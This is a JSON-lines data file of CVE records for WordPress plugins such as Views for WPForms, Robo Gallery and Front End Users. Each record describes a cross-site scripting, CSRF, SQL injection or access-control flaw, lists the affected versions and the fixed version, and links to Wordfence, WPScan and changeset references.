{"CVE_ID":"CVE-2023-7286","slug":"acf-quickedit-fields","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The plugin ACF Quick Edit Fields for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 3.2.2. This makes it possible for attackers without the edit_users capability to access metadata of other users; this includes contributor-level users and above.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5954bdc0-09e9-4691-95ff-02f7304514c9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5954bdc0-09e9-4691-95ff-02f7304514c9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=2828750%40acf-quickedit-fields&old=2816195%40acf-quickedit-fields#file89\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?new=2828750%40acf-quickedit-fields&old=2816195%40acf-quickedit-fields#file89\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3538e80e-c2c5-4e7b-97c3-b7debad7a136\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3538e80e-c2c5-4e7b-97c3-b7debad7a136\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3647","slug":"indigitall-web-push-notifications","versionEndExcluding":"3.2.3","description":"The IURNY by INDIGITALL WordPress plugin before 3.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6df05333-b1f1-4324-a1ba-dd36fbf1778c\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6df05333-b1f1-4324-a1ba-dd36fbf1778c\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4654","slug":"easy-pricing-tables","versionEndExcluding":"3.2.3","description":"The Pricing Tables WordPress Plugin WordPress plugin before 3.2.3 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a29744cd-b760-4757-8564-883d59fa4881\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a29744cd-b760-4757-8564-883d59fa4881\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0703","slug":"sticky-buttons","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Sticky Buttons \u2013 floating buttons builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via sticky URLs in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3c070be-e955-4076-9878-0b1044766397?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3c070be-e955-4076-9878-0b1044766397?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3182","slug":"restrict-content","versionEndExcluding":"3.2.3","description":"The Membership WordPress plugin before 3.2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/655a68ee-9447-41ca-899e-986a419fb7ed\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/655a68ee-9447-41ca-899e-986a419fb7ed\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0374","slug":"views-for-wpforms-lite","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Views for WPForms \u2013 Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'create_view' function. This makes it possible for unauthenticated attackers to create views via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34c0c676-37f9-49f2-ad50-2d70831fda53?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0373","slug":"views-for-wpforms-lite","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Views for WPForms \u2013 Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.2. This is due to missing or incorrect nonce validation on the 'save_view' function. This makes it possible for unauthenticated attackers to modify arbitrary post titles via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2273c53-bc8a-45c7-914d-a3b934c2cb18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0372","slug":"views-for-wpforms-lite","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Views for WPForms \u2013 Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'get_form_fields' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ab58add-ab81-4c84-b773-7daf382492b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0371","slug":"views-for-wpforms-lite","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Views for WPForms \u2013 Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'create_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to create form views.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a9565693-fd0b-4412-944c-81b3cd79492e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0370","slug":"views-for-wpforms-lite","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Views for WPForms \u2013 Display & Edit WPForms Entries on your site frontend plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_view' function in all versions up to, and including, 3.2.2. This makes it possible for authenticated attackers, with subscriber access and above, to modify the titles of arbitrary posts.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c4c8113-4c46-4179-9c7f-9d5d4337254d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.2&old=3026471&new_path=%2Fviews-for-wpforms-lite%2Ftags%2F3.2.3&new=3026471&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4149","slug":"chaty","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Floating Chat Widget: Contact Chat Icons, WhatsApp, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button WordPress plugin before 3.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0256ec2a-f1a9-4110-9978-ee88f9e24237\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0256ec2a-f1a9-4110-9978-ee88f9e24237\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5793","slug":"houzez-theme-functionality","versionImpact":"3.2.2","versionEndExcluding":"3.2.3","description":"The Houzez Theme - Functionality plugin for WordPress is vulnerable to SQL Injection via the \u2018currency_code\u2019 parameter in all versions up to, and including, 3.2.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Custom-level (seller) access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a9bbe79-a4c3-42eb-8d4d-47d26dbe9f43?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5a9bbe79-a4c3-42eb-8d4d-47d26dbe9f43?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/favethemes.zendesk.com\\\/hc\\\/en-us\\\/articles\\\/360041639432-Changelog\",\"name\":\"https:\\\/\\\/favethemes.zendesk.com\\\/hc\\\/en-us\\\/articles\\\/360041639432-Changelog\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4570","slug":"top-10","versionEndExcluding":"3.2.3","description":"The Top 10 WordPress plugin before 3.2.3 does not validate and escape some of its Block attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2483ecf-42a6-470a-b965-4e05069d1cef\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a2483ecf-42a6-470a-b965-4e05069d1cef\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7607","slug":"front-end-only-users","versionImpact":"3.2.28","versionEndExcluding":"3.2.29","description":"The Front End Users plugin for WordPress is vulnerable to time-based SQL Injection via the \u2018order\u2019 parameter in all versions up to, and including, 3.2.28 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 3.2.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec162cdc-d4cd-47d9-b941-24bfee6c48fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec162cdc-d4cd-47d9-b941-24bfee6c48fd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L42\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L42\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L76\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/html\\\/UsersPage.php#L76\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142978\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142978\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7606","slug":"front-end-only-users","versionImpact":"3.2.28","versionEndExcluding":"3.2.29","description":"The Front End Users plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'user-search' shortcode in all versions up to, and including, 3.2.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048ea84c-0d53-434b-ae49-d804ec1de8c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/048ea84c-0d53-434b-ae49-d804ec1de8c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_User_Search.php#L80\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_User_Search.php#L80\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_User_Search.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/front-end-only-users\\\/trunk\\\/Shortcodes\\\/Insert_User_Search.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142978\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3142978\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1541","slug":"kadence-blocks","versionImpact":"3.2.23","versionEndExcluding":"3.2.24","description":"The Gutenberg Blocks by Kadence Blocks \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the htmlTag attribute in all versions up to, and including, 3.2.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0913632-85c5-4835-b606-4eca51df2496?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d0913632-85c5-4835-b606-4eca51df2496?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.21\\\/includes\\\/blocks\\\/class-kadence-blocks-advanced-heading-block.php#L418\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/kadence-blocks\\\/tags\\\/3.2.21\\\/includes\\\/blocks\\\/class-kadence-blocks-advanced-heading-block.php#L418\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041366%40kadence-blocks%2Ftrunk&old=3036979%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3041366%40kadence-blocks%2Ftrunk&old=3036979%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13384","slug":"robo-gallery","versionImpact":"3.2.23","versionEndExcluding":"3.2.24","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery WordPress plugin before 3.2.24 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f65d8a83-6ce8-40be-8633-deffd555c349\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f65d8a83-6ce8-40be-8633-deffd555c349\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10102","slug":"robo-gallery","versionImpact":"3.2.21","versionEndExcluding":"3.2.22","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery WordPress plugin before 3.2.22 does not sanitise and escape some of its Gallery settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 3.2.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b34d1ec-5370-40a8-964e-663f4f9f42f8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b34d1ec-5370-40a8-964e-663f4f9f42f8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10144","slug":"robo-gallery","versionImpact":"3.2.21","versionEndExcluding":"3.2.22","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery WordPress plugin before 3.2.22 does not sanitise and escape some of its settings, which could allow high privilege users such as contributor to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 3.2.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a83521d3-0aba-493d-8dec-e764277e69b8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a83521d3-0aba-493d-8dec-e764277e69b8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12172","slug":"wp-courses","versionImpact":"3.2.21","versionEndExcluding":"3.2.22","description":"The WP Courses LMS \u2013 Online Courses Builder, eLearning Courses, Courses Solution, Education Courses plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wpc_update_user_meta_option() function in all versions up to, and including, 3.2.21. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary users' metadata, which can be leveraged to block an administrator from accessing their site when wp_capabilities is set to 0.","recommendation":"Update to version 3.2.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203679%40wp-courses&new=3203679%40wp-courses&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3203679%40wp-courses&new=3203679%40wp-courses&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/760e999e-cac9-493f-9737-ad0cf055c880?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/760e999e-cac9-493f-9737-ad0cf055c880?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8431","slug":"robo-gallery","versionImpact":"3.2.21","versionEndExcluding":"3.2.22","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajaxGetGalleryJson() function in all versions up to, and including, 3.2.21. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve private post titles.","recommendation":"Update to version 3.2.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/632c0a1a-6ac2-44c3-b66c-44fa4cf05b2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/632c0a1a-6ac2-44c3-b66c-44fa4cf05b2d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.21\\\/includes\\\/extensions\\\/block\\\/src\\\/init.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.21\\\/includes\\\/extensions\\\/block\\\/src\\\/init.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162670\\\/robo-gallery\\\/trunk\\\/includes\\\/extensions\\\/block\\\/src\\\/init.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3162670\\\/robo-gallery\\\/trunk\\\/includes\\\/extensions\\\/block\\\/src\\\/init.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3894","slug":"robo-gallery","versionImpact":"3.2.19","versionEndExcluding":"3.2.20","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via an Image Title in all versions up to, and including, 3.2.19 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e75d72d-d999-4755-8c90-7fb7d630ab00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e75d72d-d999-4755-8c90-7fb7d630ab00?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3100759%40robo-gallery%2Ftrunk&old=3066013%40robo-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3100759%40robo-gallery%2Ftrunk&old=3066013%40robo-gallery%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5343","slug":"robo-gallery","versionImpact":"3.2.19","versionEndExcluding":"3.2.20","description":"The Photo Gallery, Images, Slider in Rbs Image Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.19. This is due to missing or incorrect nonce validation on the 'rbs_ajax_create_article' and 'rbs_ajax_reset_views' functions. This makes it possible for unauthenticated attackers to create new posts and reset gallery view counts via a forged request granted they can trick a Contributor+ level user into performing an action such as clicking on a link.","recommendation":"Update to version 3.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/045fbe5b-0e63-4820-97a7-017dd72eb73a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/045fbe5b-0e63-4820-97a7-017dd72eb73a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/rbs_gallery_ajax.php#L19\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/rbs_gallery_ajax.php#L19\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/extensions\\\/rbs_create_post_ajax.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/extensions\\\/rbs_create_post_ajax.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/extensions\\\/rbs_create_post_ajax.php#L247\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/robo-gallery\\\/tags\\\/3.2.19\\\/includes\\\/extensions\\\/rbs_create_post_ajax.php#L247\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100759\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100759\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
